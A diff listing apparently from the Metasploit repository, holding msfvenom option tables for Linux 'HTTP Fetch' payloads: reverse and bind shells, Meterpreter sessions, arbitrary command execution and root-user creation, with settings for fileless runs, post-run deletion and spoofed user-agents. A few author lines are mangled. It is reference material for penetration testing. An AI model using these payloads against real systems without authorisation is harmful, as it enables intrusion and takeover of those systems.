PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/cmd-linux-http-aarch64-shell_reverse_tcp.txt
+81
View File
@@ -0,0 +1,81 @@
Name: HTTP Fetch, Linux Command Shell, Reverse TCP Inline
Module: payload/cmd/linux/http/aarch64/shell_reverse_tcp
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 105
Rank: Normal
Provided by:
Brendan Watters
Spencer McIntyre
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
SHELL /bin/sh yes The shell to execute.
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME shDguViqh no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an AARCH64 payload from an HTTP server.
Connect back to attacker and spawn a command shell
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/cmd-linux-http-armbe-meterpreter_reverse_http.txt
+104
View File
@@ -0,0 +1,104 @@
Name: HTTP Fetch
Module: payload/cmd/linux/http/armbe/meterpreter_reverse_http
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 102
Rank: Normal
Provided by:
Evasion options for payload/cmd/linux/http/armbe/meterpreter_reverse_http:
=========================
cook@rapid7.com>
timwr
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The local listener hostname
LPORT 8080 yes The local listener port
LURI no The HTTP Path
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME StuziyPw no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an ARMBE payload from an HTTP server.
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
HttpServerName Apache no The server header that the handler will send in response to requests
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.2903.86 no The user-agent that the payload should use for communication Max parameter length: 255 characters
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
MeterpreterTryToFork false no Fork a new process if the functionality is available
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/cmd-linux-http-armbe-meterpreter_reverse_https.txt
+106
View File
@@ -0,0 +1,106 @@
Name: HTTP Fetch
Module: payload/cmd/linux/http/armbe/meterpreter_reverse_https
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 114
Rank: Normal
Provided by:
Evasion options for payload/cmd/linux/http/armbe/meterpreter_reverse_https:
=========================
ok@rapid7.com>
timwr
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The local listener hostname
LPORT 8443 yes The local listener port
LURI no The HTTP Path
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME XhqxIbdAADBV no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an ARMBE payload from an HTTP server.
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
HttpServerName Apache no The server header that the handler will send in response to requests
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 no The user-agent that the payload should use for communication Max parameter length: 255 characters
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
MeterpreterTryToFork false no Fork a new process if the functionality is available
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/cmd-linux-http-armbe-meterpreter_reverse_tcp.txt
+97
View File
@@ -0,0 +1,97 @@
Name: HTTP Fetch
Module: payload/cmd/linux/http/armbe/meterpreter_reverse_tcp
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 105
Rank: Normal
Provided by:
Brendan Watters
Spencer McIntyre
Adam Cammack <adam_cammack@rapid7.com>
Brent Cook <brent_cook@rapid7.com>
timwr
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME aubpeJLQm no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an ARMBE payload from an HTTP server.
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
MeterpreterTryToFork false no Fork a new process if the functionality is available
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/cmd-linux-http-armbe-shell_bind_tcp.txt
+72
View File
@@ -0,0 +1,72 @@
Name: HTTP Fetch, Linux ARM Big Endian Command Shell, Bind TCP Inline
Module: payload/cmd/linux/http/armbe/shell_bind_tcp
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 0
Rank: Normal
Provided by:
Brendan Watters
Spencer McIntyre
Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
CMD /bin/sh yes The command to execute.
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST yes Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LPORT 4444 yes The listen port
RHOST no The target address
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME ftrEeBVpS no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an ARMBE payload from an HTTP server.
Listen for a connection and spawn a command shell
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/cmd-linux-http-armle-adduser.txt
+70
View File
@@ -0,0 +1,70 @@
Name: HTTP Fetch, Linux Add User
Module: payload/cmd/linux/http/armle/adduser
Platform: Linux
Arch: cmd
Needs Admin: Yes
Total size: 108
Rank: Normal
Provided by:
Brendan Watters
Spencer McIntyre
Jonathan Salwan
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST yes Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
PASS metasploit yes The password for this user
SHELL /bin/sh no The shell for this user
USER metasploit yes The username to create
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME CXQGzVAHjB no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an ARMLE payload from an HTTP server.
Create a new user with UID 0
Name Current Setting Required Description
---- --------------- -------- -----------
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/cmd-linux-http-armle-exec.txt
+68
View File
@@ -0,0 +1,68 @@
Name: HTTP Fetch, Linux Execute Command
Module: payload/cmd/linux/http/armle/exec
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 114
Rank: Normal
Provided by:
Brendan Watters
Spencer McIntyre
Jonathan Salwan
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
CMD yes The command string to execute
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST yes Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME RehdCjIlUXKQ no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an ARMLE payload from an HTTP server.
Execute an arbitrary command
Name Current Setting Required Description
---- --------------- -------- -----------
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/cmd-linux-http-armle-meterpreter-bind_tcp.txt
+96
View File
@@ -0,0 +1,96 @@
Name: HTTP Fetch, Bind TCP Stager
Module: payload/cmd/linux/http/armle/meterpreter/bind_tcp
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 105
Rank: Normal
Provided by:
Brendan Watters
Spencer McIntyre
Adam Cammack <adam_cammack@rapid7.com>
nemo <nemo@felinemenace.org>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST yes Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LPORT 4444 yes The listen port
RHOST no The target address
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME jXmsYyvUo no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an ARMLE payload from an HTTP server.
Listen for a connection
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableStageEncoding false no Encode the second stage payload
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
